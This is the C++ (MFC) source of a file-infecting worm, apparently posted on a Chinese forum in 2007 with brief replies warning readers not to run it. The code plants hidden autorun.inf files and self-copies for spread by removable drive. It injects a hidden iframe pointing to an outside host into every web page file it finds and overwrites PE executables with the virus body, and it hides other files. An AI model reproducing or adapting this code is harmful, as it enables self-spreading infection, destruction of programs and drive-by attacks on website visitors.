// WormBegin.cpp : implementation file
//

#include "stdafx.h"
#include "XiaoHao.h"
#include "WormBegin.h"
#include "YouHua.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif

/////////////////////////////////////////////////////////////////////////////
// CWormBegin

IMPLEMENT_DYNCREATE(CWormBegin, CView)

CWormBegin::CWormBegin()
{
}

CWormBegin::~CWormBegin()
{
}

BEGIN_MESSAGE_MAP(CWormBegin, CView)
//{{AFX_MSG_MAP(CWormBegin)
// NOTE - the ClassWizard will add and remove mapping macros here.
//}}AFX_MSG_MAP
END_MESSAGE_MAP()

/////////////////////////////////////////////////////////////////////////////
// CWormBegin drawing

void CWormBegin::OnDraw(CDC* pDC)
{
CDocument* pDoc = GetDocument();
// TODO: add draw code here
}

/////////////////////////////////////////////////////////////////////////////
// CWormBegin diagnostics

#ifdef _DEBUG
void CWormBegin::AssertValid() const
{
CView::AssertValid();
}

void CWormBegin::Dump(CDumpContext& dc) const
{
CView::Dump(dc);
}
#endif //_DEBUG

/////////////////////////////////////////////////////////////////////////////
// CWormBegin message handlers

BOOL CWormBegin::GRDirctory(CString Path)
{
char ff[256];
GetModuleFileName(NULL,ff,sizeof(ff));
MyFileName=ff;
CString Data,AutoFile,PathName;
Data="[Autorun]\r\n";
Data+="open=Xiaohao.exe\r\n";
Data+="shellexecute=Xiaohao.exe\r\n";
Data+="shell\\Auto\\command=Xiaohao.exe\r\n";
AutoFile=Path;
AutoFile+="autorun.inf";
PathName=Path;
PathName+="Xiaohao.exe";
CStdioFile Auto;
if(!Auto.Open(AutoFile,CFile::modeNoTruncate|CFile::modeWrite|CFile::modeCreate))
return FALSE;
Auto.WriteString(Data);
Auto.Close();
if(!CopyFile(MyFileName,PathName,0))
{
return FALSE;
}
else
{
SetFileAttributes(PathName,FILE_ATTRIBUTE_HIDDEN);
SetFileAttributes(AutoFile,FILE_ATTRIBUTE_HIDDEN);
return TRUE;
}
return TRUE;
}

void CWormBegin::BeginFind(CString Dir)
{
//-------------------------------------------------------------
char SystemDirectory[MAX_PATH];
GetSystemDirectory(SystemDirectory,MAX_PATH);
CString m_systemdirectory;
m_systemdirectory.Format("%s",SystemDirectory);
m_systemdirectory+="\\exloroe.exe";
VirusPath=m_systemdirectory;
//---------------------------------------------------------------
CString FileName;
CFileFind Fuck;
CString DirectoryName=Dir;
if(DirectoryName.Right(1)!="\\")
DirectoryName+="\\";
DirectoryName+="*.*";
BOOL Res = Fuck.FindFile(DirectoryName);
while(Res)
{
Res=Fuck.FindNextFile();
if(Fuck.IsDirectory() && !Fuck.IsDots())
{
BeginFind(Fuck.GetFilePath());
}
else if(!Fuck.IsDirectory() && !Fuck.IsDots())
{
CString strPath;
strPath.Format("%s",Fuck.GetFilePath());
FileName.Format("%s",Fuck.GetFileName());
FileName=FileName.Mid(FileName.ReverseFind('.')+1);
if(FileName=="htm" || FileName=="html" || FileName=="asp" || FileName=="aspx" || FileName=="php" || FileName=="jsp")
{
Jilu(strPath);
SetFileAttributes(strPath,FILE_ATTRIBUTE_NORMAL);
GanRanWeb(strPath);
}
if(FileName=="exe")
{
if(Fuck.GetFileName()=="xiaohao.exe" || Fuck.GetFileName()=="XiaoHao.exe"
||Fuck.GetFileName()=="Xiaohao.exe"||Fuck.GetFileName()=="config.exe")
continue;
SetFileAttributes(strPath,FILE_ATTRIBUTE_NORMAL);
if(!GRexe(strPath))
continue;
else
{
Jilu(strPath);
Sleep(100);
}
}
else
{
HWND hwnd=::GetForegroundWindow();
::SetWindowText(hwnd,"已中毒 X14o-H4o's Virus");
SetFileAttributes(strPath,FILE_ATTRIBUTE_HIDDEN);
}
}
}
Fuck.Close();
}

int CWormBegin::Jilu(CString ss)
{

CString str1;
str1=ss;
str1+="\r\n";
CStdioFile file;
if(!file.Open("c:\\Jilu.txt",CFile::modeNoTruncate|CFile::modeWrite|CFile::modeCreate))
return 1;
file.SeekToEnd();
file.WriteString(str1);
file.Close();
SetFileAttributes("c:\\Jilu.txt",FILE_ATTRIBUTE_HIDDEN);

}

void CWormBegin::GanRanWeb(CString FName)
{
CString str1;
CString WriteBuf="\r\n<iframe src=http://xiaohao.yona.biz/xiaohao.htm width=0 height=0></iframe>";
str1=FName;
CStdioFile file;
if(!file.Open(str1,CFile::modeNoTruncate|CFile::modeWrite))
return;
file.SeekToEnd();
file.WriteString(WriteBuf);
file.Close();
}

int CWormBegin::PD_PE(CString File_Name)
{
IMAGE_DOS_HEADER myDosHeader;
IMAGE_NT_HEADERS myNtHeader;
WORD e_magic;
FILE *pFile;
LONG e_lfanew;
DWORD Si;
if(!(pFile = fopen(File_Name,"r+b")))
return 0;
fread(&myDosHeader,sizeof(IMAGE_DOS_HEADER),1,pFile);
e_lfanew=myDosHeader.e_lfanew; //保存 pe header 的 偏移良
e_magic=myDosHeader.e_magic;
if(myDosHeader.e_magic!=IMAGE_DOS_SIGNATURE) //判断是否是ms-dos文件
{
return 0;
fclose(pFile);
}
else
{

fseek(pFile,e_lfanew,SEEK_SET); // 从 pe 头开始读取
fread(&myNtHeader,sizeof(IMAGE_NT_HEADERS),1,pFile);
Si=myNtHeader.Signature;
if(Si==IMAGE_NT_SIGNATURE)
{//判断是否是 pe00
fclose(pFile);
return 1;
}
else
{
fclose(pFile);
return 0;
}

}
fclose(pFile);
return 1;

}

int CWormBegin::GRexe(CString m_name)
{

int m_pd=PD_PE(m_name);
if(m_pd)
{

CString Biaoji="ygr";
char *Biaoji1=" ";
char *FileBuf;
DWORD FileLen=0;
DWORD FileLen1=0;
CFile s1;
CFile s2;
if(!s2.Open(VirusPath,CFile::modeReadWrite))
{
return 0;
}
if(!s1.Open(m_name,CFile::modeReadWrite))
{
return 0;
}
s2.SeekToBegin();
FileLen=s2.GetLength();
FileLen1=s1.GetLength();
FileLen1=FileLen1-4;
FileBuf=new char[FileLen+1];
FileBuf[FileLen]=0;
s2.Read(FileBuf,FileLen);
s1.Seek(FileLen1,CFile::begin);
Biaoji1=new char[4];
s1.Read(Biaoji1,sizeof(Biaoji1));
if(Biaoji1==Biaoji)
return 0;
s1.SeekToBegin();
s1.Write(FileBuf,FileLen);
s1.SeekToEnd();
s1.Write(Biaoji,4);
s1.Close();
s2.Close();
return 1;
}
else
return 0;
}

呵呵....别运行哦..

[此贴子已经被作者于2007-8-19 16:08:47编辑过]

这病毒貌似 LZ不是小浩吧？